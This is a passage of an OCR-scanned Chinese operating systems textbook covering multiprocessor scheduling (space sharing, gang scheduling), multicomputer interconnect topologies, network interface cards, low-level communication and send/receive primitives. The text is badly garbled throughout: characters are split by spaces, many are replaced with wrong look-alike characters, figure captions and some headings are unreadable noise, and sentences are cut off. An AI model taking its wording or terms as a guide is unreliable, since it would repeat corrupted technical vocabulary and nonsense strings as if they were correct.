或 其 他 的 手段 分 别 进行 。 通 过 试图 让 一 个 线程 在 其 生命 周期 内 在 同一 个 
CPU 上 运行 的 方法 ， 高 速 缓存 的 杀 和 力 得 到 了 最 大 化 。 不 过 ， 如 果 某 一 
个 CPU 没 有 线程 运行 ， 它 便 选取 为 一 个 CPU 的 一 个 线程 来 运行 而 不 是 空 
转 。 








两 级 调度 算法 有 三 个 优点 。 第 一 ， 它 把 负载 大 致 平均 地 分 配 在 可 用 
的 CPU 上 ; 第 二 ， 它 尽 可 能 发 挥 了 高 速 缓存 杀 和 力 的 优势 ， 第 三 ， 通 过 
为 每 个 CPU 提供 一 个 私有 的 就 绪 线程 链表 ， 使 得 对 就 绪 线程 链表 的 郭 争 
减 到 了 最 小 ， 因 为 试图 使 用 另 一 个 CPU 的 就 绪 线 程 链表 的 机 会 相对 较 


小 。 


当 线 程 之 间 以 某 种 方式 彼此 相关 时 ， 可 以 使 用 其 他 多 处 理 机 调度 方 


法 。 前 面 我 们 叙述 过 的 并 行 make 束 是 一 个 例子 。 经 第 还 有 一 个 线程 创建 
多 个 共同 工作 的 线程 的 情况 发 生 。 例 如 当 一 个 进程 的 多 个 线程 间 频 繁 地 
进行 通信 ， 让 其 在 同一 时 间 执 行 就 显得 尤为 重要 。 在 多 个 CPU 上 同时 调 
度 多 个 线程 称 为 空间 共享 (space sharing) 。 








最 简单 的 空间 共享 算法 是 这 样 工 作 的 。 假 设 一 组 相关 的 线程 是 一 次 
性 创建 的 。 在 其 创建 的 时 刻 ， 调 度 程 序 检 查 是 否 有 同 线程 数量 一 样 多 的 
空 采 CPU 存在 。 如 果 有 ， 每 个 线程 获得 各 自 专用 的 CPU 〈 非 多 道 程序 处 
理 ) 并 且 都 开始 运行 。 如 果 没 有 足够 的 CPU， 就 没有 线程 开始 运行 ， 直 
到 有 足够 的 CPU 时 为 止 。 每 个 线程 保持 其 CPU 直到 它 终 止 ， 并 且 该 CPU 
被 送 回 可 用 CPU 池 中 。 如 果 一 个 线程 在 1O 上 阻塞 ， 它 继续 保持 其 
CPU， 而 该 CPU 就 空 采 直到 该 线程 被 唤醒 。 在 下 一 批 线程 出 现时 ， 应 用 
同样 的 算法 。 











在 任何 一 个 时 刻 ， 全 部 CPU 被 静态 地 划分 成 若干 个 分 区 ， 每 个 分 区 
都 运行 一 个 进程 中 的 线程 。 例 如 ， 在 图 8-13 中 ， 分 区 的 大 小 是 4、6、8 
和 12 个 CPU， 有 两 个 CPU 没有 分 配 。 随 着 时 间 的 流逝 ， 新 的 线程 创建 ， 
旧 的 线程 终止 ，CPU 分 区 大 小 和 数量 都 会 发 生变 化 。 


ER as ee ee ee 4 个 


的 分 区 | [1] [2] [3]: 
[e] [10] 


IN. : ; 
人 区 — he] [s] 


未 分 配 i 12 个 CPU 的 分 区 


图 8-13 一 个 32 个 CPU 的 集合 被 分 成 4 个 分 区 ， 两 个 CPU 可 用 


必须 进行 周期 性 的 调度 决策 。 在 单 处 理 机 系统 中 ， 最 短 作 业 优 先是 
批 处 理 调度 中 知名 的 算法 。 在 多 处 理 机 系统 中 类 似 的 算法 是 ， 选 择 需要 
最 少 的 CPU 周期 数 的 线程 ， 也 就 是 其 CPU 周期 数 x 运 行 时 间 最 小 的 线程 
为 候选 线程 。 然 而 ， 在 实际 中 ， 这 一 信息 很 难得 到 ， 因 此 该 算法 难以 实 
现 。 事 实 上 ， 研 究 表 明 ， 要 胜 过 先 来 先 服务 算法 是 非常 困难 的 
(Krueger 等 人 ，1994) 。 











在 这 个 简单 的 分 区 模型 中 ， 一 个 线程 请 求 一 定数 量 的 CPU， 然 后 或 
者 全 部 得 到 它们 或 者 一 直 等 到 有 足够 数量 的 CPU 可 用 为 止 。 另 一 种 处 理 
方式 是 主动 地 管理 线程 的 并 行 度 。 管 理 并 行 度 的 一 种 途径 是 使 用 一 个 中 
心服 务 器 ， 用 它 跟 踪 哪 些 线程 正在 运行 ， 哪 些 线程 希望 运行 以 及 所 需 
CPU 的 最 小 和 最 大 数量 (Tucker 和 Gupta，1989) 。 每 个 应 用 程序 周期 
性 地 询问 中 心服 务 器 有 多 少 个 CPU 可 用 。 然 后 它 调整 线程 的 数量 以 符合 





可 用 的 数量 。 例 如 ， 一 台 Web 服 务 器 可 以 5、10、20 或 任何 其 他 数量 的 
线程 并 行 运 行 。 如 果 它 当前 有 10 个 线程 ， 突 然 ， 系 统 对 CPU 的 需求 增加 
了 ， 于 是 它 被 通知 可 用 的 CPU 数量 减 到 了 5 个 ， 那 么 在 接 下 来 的 5 个 线程 
完成 其 当前 工作 之 后 ， 它 们 融和 被 通知 退出 而 不 是 给 予 新 的 工作 。 这 种 机 
制 多 许 分 区 大 小 动态 地 变化 ， 以 便 与 当前 负载 相 匹 配 ， 这 种 方法 优 于 图 
8-13 中 的 固定 系统 。 





3. 群 调度 (Gang Scheduling) 


空间 共有 至 的 一 个 明显 优点 是 消除 了 多 道 程序 设计 ， 从 而 消除 了 上 下 

文 切 换 的 开销 。 但 是 ， 一 个 同样 明显 的 缺点 是 当 CPU 被 阻塞 或 根本 无 事 

可 做 时 时 间 被 浪费 了 ， 只 有 等 到 其 再 次 束 纵 。 于 是 ， 人 们 寻找 既 可 以 调 

度 时 间 又 可 以 调度 空间 的 算法 ， 特 别 是 对 于 要 创建 多 个 线程 而 这 些 线程 
通常 需要 彼此 通信 的 线程 。 


为 了 考察 一 个 进程 的 多 个 线程 被 独立 调度 时 会 出 现 的 问题 ， 设 想 一 
个 系统 中 有 线程 Au 和 Ai 属于 进程 A， 而 线程 Bu 和 Bi 属于 进程 B。 线 程 
Au 和 Bo 在 CPU 0 上 分 时 ;而 线程 Al 和 Bi 在 CPU 1 上 分 时 。 线 程 Au MA 
需要 经 常 通信 。 其 通信 模式 是 ，Ao 送 给 Ai 一 个 消息 ， 然 后 Ai 回 送 给 Au 
一 个 应 答 ， 紧 跟 的 是 另 一 个 这 样 的 序列 。 假 设 正好 是 Au 和 Bi 首先 开 
始 ， 如 图 8-14 所 示 。 





线程 A 运行 





图 8-14 进程 A 的 两 个 异步 运行 的 线程 间 的 通信 


FERS TA TO, Ap 发 给 Ai 一 个 请 求 ， 但 是 直到 Ai 在 开始 于 100ms 的 
时 间 片 1 中 开始 运行 时 它 才 得 到 该 消息 。 它 立即 发 送 一 个 应 答 ， 但 是 直 
到 Au 在 200ms 再 次 运行 时 它 才 得 到 该 应 答 。 最 终结 果 是 每 200ms 一 个 请 


求 -应 答 序列 。 这 个 结果 并 不 好 。 








这 一 问题 的 解决 方案 是 群 调度 (gang scheduling) ， 它 是 协同 调度 
(co-scheduling) (Outsterhout, 1982) 的 发 展 产 物 。 群 调度 由 三 个 音 
分 组 成 : 


1) 把 一 组 相关 线程 作为 一 个 单位 ， 即 一 个 群 〈gang) ， 一 起 调度 。 
2) 一 个 群 中 的 所 有 成 员 在 不 同 的 分 时 CPU 上 同时 运行 。 


3) 群 中 的 所 有 成 员 共 同 开 始 和 结束 其 时 间 片 。 


使 群 调度 正确 工作 的 关键 是 ， 同 步调 度 所 有 的 CPU。 这 意味 着 把 时 
间 划 分 为 离散 的 时 间 片 ， 如 图 8-14 中 所 示 。 在 每 一 个 新 的 时 间 片 开始 
时 ， 所 有 的 CPU 都 重新 调度 ， 在 每 个 CPU 上 都 开始 一 个 新 的 线程 。 在 后 
续 的 时 间 片 开始 时 ， 另 一 个 调度 事件 发 生 。 在 这 之 间 ， 没 有 调度 行为 。 
如 果 某 个 线程 被 阻塞 ， 它 的 CPU 保持 空闲 ， 直 到 对 应 的 时 间 片 结束 为 
Ik. 











有 关 群 调度 是 如 何 工 作 的 例子 在 图 8-15 中 给 出 。 图 8-15 中 有 一 台 带 6 
个 CPU 的 多 处 理 机 ， 由 5 个 进程 A 到 E 使 用 ， 总 共有 24 个 就 绪 线 程 。 在 时 
间 槽 (time slot) 0， 线 程 Au 至 Al 被 调度 运行 。 在 时 间 槽 1， 调 度 线程 
Bu Bis By x Co. Cy AIC, 被 调度 运行 。 在 时 间 槽 2， 进程 DD 的 5 个 线 
程 以 及 Eo 运行 。 剩 下 的 6 个 线程 属于 E， 在 时 间 模 3 中 运行 。 然 后 周期 重 
复 进行 ， 时 间 槽 4 与 时 间 横 0 一 样 ， 以 此 类 推 。 


Ey [ia] A 
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图 8-15 群 调度 


群 调度 的 思想 是 ， 让 一 个 进程 的 所 有 线程 一 起 运行 ， 这 样 ， 如 果 其 
中 一 个 线程 向 另 一 个 线程 发 送 请 求 ， 接 受 方 几乎 会 立即 得 到 消息 ， 并 且 
几乎 能 够 立即 应 答 。 在 图 8-15 中 ， 由 于 进程 的 所 有 线程 在 同一 个 时 间 片 
内 一 起 运行 ， 它 们 可 以 在 一 个 时 间 片 内 发 送 和 接受 大 量 的 消息 ， 从 而 消 
除了 图 8-14 中 的 问题 。 











8.2 ”多 计算 机 





多 处 理 机 流行 和 有 吸引 力 的 原因 是 ， 它 们 提供 了 一 个 简单 的 通信 模 
型 : 所 有 CPU 共 享 一 个 公用 存储 器 。 进 程 可 以 向 存储 器 写 消息 ， 然 后 被 
其 他 进程 读 取 。 可 以 使 用 互 斥 信号 量 、 信 和 号 量 、 管 程 (monitor) 和 其 他 
适合 的 技术 实现 同步 。 惟 一 美中不足 的 是 ， 大 型 多 处 理 机 构造 困难 ， 因 








为 了 解决 这 个 问题 ， 人 们 在 多 计算 机 (multicomputers) 领域 中 进 
行 了 很 多 研究 。 多 计算 机 是 紧 耦 合 CPU， 不 共享 存储 器 。 每 台 计 算 机 有 
自己 的 存储 器 ， 如 图 8-1b 所 示 。 众 所 周知 ， 这 些 系 统 有 各 种 其 他 的 名 
称 ， 如 机 群 计算 机 (cluster computers) 以 及 工作 站 机 群 (Clusters of 
Workstations, COWS) 。 





多 计算 机 容易 构造 ， 因 为 其 基本 部 件 只 是 一 合 配 有 高 性 能 网 络 接口 
卡 的 PC 裸 机 。 当 然 ， 获 得 高 性 能 的 秘密 是 巧妙 地 设计 互连网 络 以 及 接 
口 卡 。 这 个 问题 与 在 一 台 多 处 理 机 中 构造 共享 存储 器 是 完全 类 似 的 。 但 
是 ， 由 于 目标 是 在 微 秒 Cmicrosecond) 数量 级 上 发 送 消息 ， 而 不 是 在 纳 
秒 (nanosecond) 数量 级 上 访问 存储 器 ， 所 以 这 是 一 个 相对 简单 、 便 宜 
且 容 易 实现 的 任务 。 


在 下 面 几 节 中 ， 我 们 将 首先 简要 地 介绍 多 计算 机 硬件 ， 特 别 是 互 连 


硬件。 然后 ， 我 们 将 讨论 软件 ， 从 低层 通信 软件 开始 ， 接 着 是 高 层 通信 
软件 。 我 们 还 将 讨论 在 没有 共享 存储 絮 的 系统 中 实现 共享 存储 器 的 方 
法 。 最 后 ， 我 们 将 讨论 调度 和 负载 平衡 的 问题 。 





8.2.1 多 计算 机 硬件 


一 台 多 计算 机 的 基本 市 点 包 括 一 个 CPU、 存 储 絮 、 一 个 网 络 接口 ， 
有 时 还 有 一 个 硬盘 。 市 点 可 以 封 六 在 标准 的 PC 机 箱 中 ， 不 过 通常 没有 
图 像 适 配 卡 、 显 示 器 、 键 盘 和 鼠标 等 。 在 茶 些 情况 下 ，PC 机 中 有 一 块 2 
通道 或 4 通道 的 多 处 理 机 主板 ， 可 能 带 有 双核 或 者 四 核心 厂 而 不 是 单个 
CPU， 不 过 为 了 简化 问题 ， 我 们 假设 每 个 市 点 有 一 个 CPU。 通 常 成 百 个 
甚至 上 千 个 市 把 连接 在 一 起 组 成 一 个 多 计算 机 。 下 面 我 们 将 介绍 一 些 关 
于 硬件 如 何 组 织 的 内 容 。 


1. 互 连 技 术 











在 每 个 节点 上 有 一 块 网 卡 ， 带 有 一 根 或 两 根 从 网 卡 上 接 出 的 电线 
〈 或 光纤 ) 。 这 些 电线 或 者 连 到 其 他 的 节点 上 ， 或 者 连 到 交换 机 上 。 在 
小 型 系统 中 ， 可 能 会 有 一 个 按照 图 8-16a 的 星 型 拓扑 结构 连接 所 有 节点 
的 的 交换 机 。 现 代 交 换 型 以 太 网 就 采用 了 这 种 拓扑 结构 。 





作为 单一 交换 机 设计 的 为 一 种 选择 ， 市 点 可 以 组 成 一 个 环 ， 有 两 根 
线 从 网 络 接口 卡 上 出 来 ， 一 根 去 连接 左面 的 节点 ， 另 一 根 去 连接 右面 的 





节点 ， 如 图 8-16b 所 示 。 在 这 种 拓扑 结构 中 不 需要 交换 机 ， 所 以 网 中 也 
没有 。 


图 8-16c 中 的 网 格 〈grid 或 mesh) 是 一 种 在 许多 商业 系统 中 应 用 的 二 
维 设计 。 它 相当 规整 ， 而 且 容 易 扩展 为 大 规模 系统 。 这 种 系统 有 一 个 直 
f£ (diameter) ， 即 在 任意 两 个 节点 之 间 的 最 长 路 径 ， 并 且 该 值 只 按照 
市 点 数目 的 平方 根 增加 。 网 格 的 变种 是 双 凸 面 (double torus) ， 如 图 8- 
16d 所 示 ， 这 是 一 种 边 连 通 的 网 格 。 这 种 拓扑 结构 不 仅 较 网 格 具 有 更 强 
的 容错 能 力 而 且 其 直径 也 比较 小 ， 因 为 对 角 之 间 的 通信 中 需要 两 跳 。 














图 8-16e 中 的 立方 体 (cube)〉 是 一 种 规则 的 三 维 拓扑 结构 。 我 们 展示 
的 是 2x2x2 立 方 体 ， 更 一 般 的 情形 则 是 kxkxkY 方 体 。 在 图 8-16f 中 ， 是 
一 种 用 两 个 三 维 立方 体 加 上 对 应 边 连 接 所 组 成 四 维 立 方 体 。 我 们 可 以 仿 
照 图 8-16f 的 结构 并 且 连 接 对 应 的 节点 以 组 成 四 个 立方 体 组 块 来 制作 五 维 
立方 体 。 为 了 实现 六 维 ， 可 以 复制 四 个 立方 体 的 块 并 把 对 应 节点 互 连 起 
来 ， 以 此 类 推 。 以 这 种 形式 组 成 的 n 维 立方 体 称 为 超 立方 体 
Chypercube) 。 许 多 并 行 计算 机 采用 这 种 拓扑 结构 ， 因 为 其 直径 随 着 维 
数 的 增加 线性 增长 。 换 名 话说 ， 直 径 是 节点 数 的 自然 对 数 ， 例 如 ， 一 个 
10 维 的 超 立 方 体 有 1024 个 节点 ， 但 是 其 直径 仅 为 10， 有 着 出 色 的 延迟 特 
性 。 注 意 ， 与 之 相反 的 是 ，1024 的 节点 如 果 按 照 32x32 网 格 布局 则 其 直 
径 为 62， 较 超 立 方 体 相 差 了 六 倍 多 。 对 于 超 立 方 体 而 言 ， 获 得 较 小 直径 
的 代价 是 扇 出 数量 Cfanout) 以 及 由 此 而 来 的 连接 数量 《及 成 本 ) 的 大 











量 增 加 。 





d) e) f) 


图 8-16 各 种 互 连 拓扑 结构 : 引 单 交换 机 ; HDA; ODMH; ARAGD; 
6 立方 体 ; 人 四 维 超 立 方 体 


在 多 计算 机 中 可 采用 两 种 交换 机 制 。 在 第 一 种 机 制 里 ， 每 个 消息 首 
先 被 分 解 〈“ 由 用 户 软件 或 网 络 接口 进行 ) 成 为 有 最 大 长 度 限 制 的 块 ， 称 
为 包 Cpacket) 。 该 交换 机 制 称 为 存储 转发 包 交 换 (store-and-forward 
packet switching) ， 由 源 节 点 的 网 络 接口 卡 注 入 到 第 一 个 交换 机 的 包 组 
成 ， 如 图 8-17a 所 示 。 比 特 捉 一 次 进来 一 位 ， 妆 整个 包 到 达 一 个 输入 绥 
冲 区 时 ， 它 被 复制 到 沿 着 其 路 径 通 各 下 一 个 交换 机 的 队列 当中 ， 如 图 8- 





17b 所 示 。 当 包 到 达 目 标 节 点 所 连接 的 交换 机 时 ， 如 图 8-17c 所 示 ， 该 包 
被 复制 进入 目标 节点 的 网 络 接口 卡 ， 并 最 终 到 达 其 RAM。 


4 端口 输入 端口 
交换 机 输出 端口 





整个 包 | 





整个 包 整个 包 


a) b) c) 


图 8-17 存储 转发 包 交 换 


尽管 存储 转发 包 交 换 灵 活 且 有 效 ， 但 是 它 存 在 通过 互连网 络 时 增加 
PSHE (HEIR) 的 问题 。 假 设 在 图 8-17 中 把 一 个 包 传送 一 跳 所 花费 的 时 间 
为 T 纳 秒 。 为 了 从 CPU 1 到 CPU 2， 该 包 必 须 被 复制 四 次 (至 A、 至 C、 
至 D 以 及 到 目标 CPU) ， 而 且 在 前 一 个 包 完 成 之 前 ， 不 能 开始 有 关 的 复 
制 ， 所 以 通过 该 互连网 络 的 时 延 是 4T。 一 条 出 路 是 设计 一 个 网 络 ， 其 中 
的 包 可 以 逻辑 地 划分 为 更 小 的 单元 。 只 要 第 一 个 单元 到 达 一 个 交换 机 ， 
它 就 被 转发 到 下 一 个 交换 机 ， 甚 至 可 以 在 包 的 结尾 到 达 之 前 进行 。 可 以 
想象 ， 这 个 传送 单元 可 以 小 到 1 比特 。 


男 一 种 交换 机 制 是 电路 交换 (circuit switching) ， 它 包括 由 第 一 个 


交换 机 建立 的 ， 通 过 所 有 交换 机 而 到 达 目 标 交 换 机 的 一 条 路 径 。 一 旦 该 
路 径 建 立 起 来 ， 比 特 流 就 从 源 到 目的 地 通过 整个 路 径 不 断 地 尽快 输送 。 
在 所 涉及 的 交换 机 中 ， 没 有 中 间 缓 冲 。 电 路 交换 需要 有 一 个 建立 阶段 ， 

它 需 要 一 点 时 间 ， 但 是 一 旦 建立 完成 ， 速 度 就 很 快 。 在 包 必 送 完 毕 之 

后 ， 该 路 径 必 须 被 拆除 。 电 路 交换 的 一 种 变种 称 为 虫 孔 路 由 《〈wormhole 
routing) ， 它 把 每 个 包 拆 成 子 包 ， 并 人 允许 第 一 个 子 包 在 整个 路 径 还 没有 
完全 建立 之 前 就 开始 流动 。 











2. 网 络 接口 


在 多 计算 机 中 ， 所 有 节点 里 都 有 一 块 插 卡 板 ， 它 包含 节点 与 互连网 
络 的 连接 ， 这 使 得 多 计算 机 连 成 一 体 。 这 些 板 的 构造 方式 以 及 它们 如 何 
同 主 CPU 和 RAM 连 接 对 操作 系统 有 重要 影响 。 这 里 简要 地 介绍 一 些 有 
天 的 内 容 。 部 分 内 容 来 源 于 (Bhoedjang，2000) . 











事实 上 在 所 有 的 多 计算 机 中 ， 接 口 板 上 都 有 一 些 用 来 存储 进出 包 的 
RAM。 通 第 ， 在 包 被 传送 到 第 一 个 交换 机 之 前 ， 这 个 要 送出 的 包 必 须 
被 复制 到 接口 板 的 RAM 中 。 这 样 设计 的 原因 是 许多 互连网 络 是 同步 
的 ， 所 以 一 旦 一 个 包 的 传送 开始 ， 比 特 流 必须 以 恒定 的 速率 连续 进行 。 
如 果 包 在 主 RAM 中 ， 由 于 和 内存 总 线 上 有 其 他 的 信息 流 ， 所 以 这 个 送 到 
网 络 上 的 连续 流 是 不 能 保证 的 。 在 接口 板 上 使 用 专门 的 RAM， 就 消除 


了 这 个 问题 。 这 种 设计 如 图 8-18 所 示 。 











图 8-18 网 络 接口 卡 在 多 计算 机 中 的 位 置 


同样 的 问题 还 出 现在 接收 进来 的 包 上 。 从 网 络 上 到 达 的 比特 流速 率 
是 恒定 的 ， 并 且 经 党 有 非常 高 的 速率 。 如 果 网 络 接口 卡 不 能 在 它们 到 达 
的 时 候 实 时 存储 它们 ， 数 据 将 会 丢失 。 同 样 ， 在 这 里 试图 通过 系统 总 线 
《例如 PCI 总 线 ) 到 达 主 RAM 是 非常 危险 的 。 由 于 网 卡通 常 插 在 PCI 忆 
线 上 ， 这 是 一 个 惟一 的 通 向 主 RAM 的 连接 ， 所 以 不 可 避免 地 要 同 磁盘 
以 及 每 个 其 他 的 IO 设备 竞争 总 线 。 而 把 进来 的 包 首先 保存 在 接口 板 的 
私有 RAM 中 ， 然 后 再 把 它们 复制 到 主 RAM 中 ， 则 更 安全 些 。 








接口 板 上 可 以 有 一 个 或 多 个 DMA 通 道 ， 甚 至 在 板 上 有 一 个 完整 的 
CPU “〈 乃 至 多 个 CPU ) 。 通 过 请 求 在 系统 总 线 上 的 块 传 送 Cblock 
transfer) ，DMA 通 道 可 以 在 接口 析 和 主 RAM 之 间 以 非 营 高 的 速率 复制 





包 ， 因 而 可 以 一 次 性 传送 大 和 干 字 而 不 需要 为 每 个 字 分 别 请 求 总 线 。 不 
过 ， 准 确 地 说 ， 正 是 这 种 块 传送 《〈 它 占用 了 系统 总 线 的 多 个 总 线 周 期 ) 
使 接口 板 上 的 RAM 的 需要 是 第 一 位 的 。 


很 多 接口 板 上 有 一 个 完整 的 CPU， 可 能 另外 还 有 一 个 或 多 个 DMA 
通道 。 它 们 被 称 为 网 络 处 理 器 (network processor) ， 并 且 其 功能 日 趋 
强大 。 这 种 设计 意味 着 主 CPU 将 一 些 工 作 分 给 了 网 卡 ， 诸 如 处 理 可 靠 的 
传送 (如 果 底 层 的 硬件 会 圣 包 ) 、 多 播 〈 将 包 发 送 到 多 于 一 个 的 目的 
地 ) 、 压 缩 / 解 压缩 、 加 密 / 解 蜜 以 及 在 多 进程 系统 中 处 理 安 全 事务 等 。 
但 是 ， 有 两 个 CPU 则 意味 着 它们 必须 同步 ， 以 避免 苋 争 条 件 的 发 生 ， 这 
将 增加 额外 的 开销 ， 并 且 对 于 操作 系统 来 说 意味 着 要 承担 更 多 的 工作 。 








8.2.2 ”低层 通信 软件 








在 多 计算 机 系统 中 高 性 能 通信 的 敌人 是 对 包 的 过 度 复制 。 在 最 好 的 
情形 下 ， 在 源 节 氮 会 有 从 RAM 到 接口 板 的 一 次 复制 ， 从 源 接 口 板 到 目 
的 接口 板 的 一 次 复制 《如 果 在 路 径 上 没有 存储 和 转发 发 生 ) 以 及 从 目的 
接口 板 再 到 目的 地 RAM 的 一 次 复制 ， 这 样 一 共有 三 次 复制 。 但 是 ， 在 
许多 系统 中 情况 要 糟糕 得 多 。 特 别 是 ， 如 果 接 口 板 被 映射 到 内 核 虚 拟 地 
址 空间 中 而 不 是 用 户 虚 拟 地 址 空间 的 话 ， 用 户 进程 只 能 通过 发 出 一 个 陷 
入 到 内 核 的 系统 调用 的 方式 来 发 送 包 。 内 核 会 同时 在 输入 和 输出 时 把 包 
复制 到 目 己 的 存储 空间 去 ， 从 而 在 传送 到 网 络 上 时 避免 出 现 缺 页 异常 
(page fault) 。 同 样 ， 接 收 包 的 内 核 在 有 机 会 检查 包 之 前 ， 可 能 也 不 知 
道 应 该 把 进来 的 包 放 置 到 哪里 。 上 述 五 个 复制 步骤 如 图 8-18 所 示 。 








如 果 说 进出 RAM 的 复制 是 性 能 瓶颈 ， 那 么 进出 内 核 的 额外 复制 会 
将 端 到 端的 延迟 加 倍 ， 并 把 吞吐 量 throughput) 降低 一 半 。 为 了 避免 
这 种 对 性 能 的 影响 ， 不 少 多 计算 机 把 接口 板 映射 到 用 户 空 间 ， 并 人 允许 用 
户 进 程 直接 把 包 送 到 卡 上 ， 而 不 需要 内 核 的 参与 。 尽 管 这 种 处 理 确 实 改 
善 了 性 能 ， 但 却 带 来 了 两 个 问题 。 











首先 ， 如 果 在 节点 上 有 香干 个 进程 运行 而 且 需 要 访问 网 络 以 发 送 
包 ， 该 怎么 办 ? 哪 一 个 进程 应 该 在 其 地 址 空间 中 获得 接口 板 呢 ? 映射 拥 








有 一 个 系统 调用 将 接口 板 映 射 进出 一 个 虚拟 地 址 空间 ， 其 代价 是 很 高 
的 ， 但 是 ， 如 宁 只 有 一 个 进程 获得 了 卡 ， 那 么 其 他 进程 该 如 何 发 送 包 
Ne? 如 宁 网 卡 被 映射 进 了 进程 A 的 虚拟 地 址 空间 ， 而 所 到 达 的 包 却 是 进 
程 B 的 ， 又 该 怎么 办 ?尤其 是 ， 如 果 A 和 B 属 于 不 同 的 所 有 者 ， 其 中 任何 
TMA EDDA, XBAI? 


一 个 解决 方案 是 ， 把 接口 板 映 射 到 所 有 需要 它 的 进程 中 去 ， 但 是 这 
样 做 就 需要 有 一 个 机 制 用 以 避免 竞 委 。 例 如 ， 如 果 A 申 明 接口 板 上 的 一 
个 缓冲 区 ， 而 由 于 时 间 片 ，B 开 始 运行 并 且 申 明 同 一 个 缓冲 区 ， 那 么 就 
会 发 生 灾难 。 需 要 有 东 种 同步 机 制 ， 但 是 那些 诸如 互 斥 信号 量 
(mutex) 一 类 的 机 制 需 要 在 进程 会 彼此 协作 的 前 提 下 才能 工作 。 在 有 
多 个 用 户 的 分 时 环境 下 ， 所 有 的 用 户 都 希望 其 工作 尽快 完成 ， 茶 个 用 户 
也 许 会 锁 住 与 接口 板 有 关 的 互 斥 信号 量 而 不 肯 释 放 。 从 这 里 得 到 的 结论 
是 ， 对 于 将 接口 板 映射 到 用 户 空 间 的 方案 ， 只 有 在 每 个 节点 上 只 有 一 个 
用 户 进程 运行 时 才能 够 发 挥 作用 ， 人 否则 必须 设置 专门 的 预防 机 制 《〈 例 
如 ， 对 不 同 的 进程 可 以 把 接口 板 上 RAM 的 不 同 部 分 映射 到 各 自 的 地 址 


空间 ) 。 


























第 二 个 问题 是 ， 内 核 本 喘 会 经 常 需要 访问 互连网 络 ， 例 如 ， 访 问 远 
程 节 点 上 的 文件 系统 。 如 果 考 虑 让 内 核 与 任何 用 户 共享 同一 块 接口 板 ， 
即便 是 基于 分 时 方式 ， 也 不 是 一 个 好 主意 。 假 设 当 板 被 映射 到 用 户 空 
间 ， 收 到 了 一 个 内 核 的 包 ， 那 么 怎么 办 ? 或 者 奉 某 个 用 户 进 程 向 一 个 伪 


凌 成 内 核 的 远程 机 器 发 送 了 一 个 包 ， 又 该 上 怎么 办 ? 结论 是 ， 最 简单 的 设 
计 是 使 用 两 块 网 络 接 口 板 ， 一 块 映射 到 用 户 空 间 供应 用 程序 使 用 ， 男 一 
块 映 射 到 内 核 空 间 供 操作 系统 使 用 。 许 多 多 计算 机 就 正 是 这 样 做 的 。 


市 点 人 至 网 络 接口 通信 


下 一 个 问题 是 如 何 将 包 送 到 接口 板 上 。 最 快 的 方法 是 使 用 板 上 的 
DMA 心 片 直 接 将 它们 从 RAM 复 制 到 板 上 。 这 种 方式 的 问题 是 ，DMA 使 
用 物理 地 址 而 不 是 虚拟 地 址 ， 并 且 独 立 于 CPU 运行 。 首 先 ， 尽 管 一 个 用 
户 进程 背 定 知道 它 打算 发 送 的 任何 包 所 在 的 虚拟 地 址 ， 但 它 通 常 不 知道 
有 关 的 物理 地 址 。 设 计 一 个 系统 调用 进行 虚拟 地 址 到 物理 地 址 的 映射 是 
不 可 取 的 ， 因 为 把 接口 板 放 到 用 户 空间 的 首要 原因 就 是 为 了 避免 不 得 不 
为 每 个 要 发 送 的 包 进 行 一 次 系统 调用 。 














另外 ， 如 宋 操 作 系统 决定 丛 换 一 个 页 面 ， 而 DMA 臣 片 正在 从 该 页 
面 复 制 一 个 包 ， 就 会 传送 错误 的 数据 。 然 而 更 加 糟糕 的 是 ， 如 果 操 作 系 
统 在 替换 某 一 个 页 面 的 同时 DMA 芯 片 正 在 把 一 个 包 复 制 进 该 页 面 ， 结 
打 不 仅 进来 的 包 会 丢失 ， 无 齐 的 存储 器 页 面 也 会 被 毁坏 。 





为 了 以 避免 上 述 问题 ， 可 采用 一 类 将 页 面 杀 住 和 释放 的 系统 调用 ， 
把 有 关 页 面 标记 成 暂时 不 可 交换 的 。 但 是 不 仅 需要 有 一 个 系统 调用 钉 住 
含有 每 个 输出 包 的 页 面 ， 还 要 有 为 一 个 系统 调用 进行 释放 工作 ， 这 样 做 
的 代价 太 大 。 如 果 包 很 小 ， 比 如 64 字 市 或 更 小 ， 就 不 能 忍受 杀 住 和 释放 











每 个 缓冲 区 的 开销 。 对 于 大 的 包 ， 比 如 说 1KB 或 更 大 ， 也 许 会 容忍 相关 
开销 。 对 于 大 小 在 这 两 者 之 间 的 包 ， 就 要 取决 于 硬件 的 具体 情况 了 。 除 
了 会 对 性 能 带 来 影响 ， 钉 住 和 释放 页 面 将 会 增加 软件 的 复杂 性 。 


8.2.3 ”用户 层 通信 软件 


在 多 计算 机 中 ， 不 同 CPU 上 的 进程 通过 互相 发 送 消息 实现 通信 。 在 
最 简单 的 情况 下 ， 这 种 消 恩 传送 是 歇 串 给 用 户 进 程 的 。 换 句 话说 ， 操 作 
系统 提供 了 一 种 发 送 和 接收 消 恩 的 途径 ， 而 库 过 程 使 得 这 些 低 层 的 调用 
对 用 户 进程 可 用 。 在 较 复 杂 的 情形 下 ， 通 过 使 得 远程 通信 看 起 来 像 过 程 
调用 的 办 法 ， 将 实际 的 消息 传递 对 用 户 隐 藏 起 来 。 下 面 将 讨论 这 两 种 方 
as 


1. 发 送 和 接收 


在 最 简化 的 的 情形 下 ， 所 提供 的 通信 服务 可 以 减少 到 两 个 ( 库 ) 调 
用 ， 一 个 用 于 发 送 消 息 ， 为 一 个 用 于 接收 消息 。 发 送 一 条 消 姑 的 调用 可 
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send (dest, &mptr) ; 


而 接收 消息 的 调用 可 能 是 





receive (addr, &mptr) ; 
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蹇 ， 直 到 消息 到 达 。 该 消 轧 到 达 后 ， 被 复制 到 由 mptr 参 数 所 指 加 的 缓冲 
区 ， 并 且 撤 销 对 调用 者 的 阻塞 。addr 参 数 指定 了 接收 者 要 监听 的 地 址 。 
这 两 个 过 程 及 其 参数 有 许多 可 能 的 变种 。 





一 个 问题 是 如 何 编 址 。 由 于 多 计算 机 是 静态 的 ，CPU 数 目 是 固定 
的 ， 所 以 处 理 编 址 问题 的 最 便利 的 办 法 是 使 addr 由 两 部 分 的 地 址 组 成 ， 
其 中 一 部 分 是 CPU 编号 ， 另 一 部 分 是 在 这 个 已 编 址 的 CPU 上 的 一 个 进程 
或 端口 的 编号 。 在 这 种 方式 中 ， 每 个 CPU 可 以 管理 自己 的 地 址 而 不 会 有 
潜在 的 冲突 。 





2. SAE Vel A ASE BA Eel 


上 面 押 叙述 的 调用 是 阻塞 调用 《有 时 称 为 同步 调用 ) 。 当 一 个 进程 
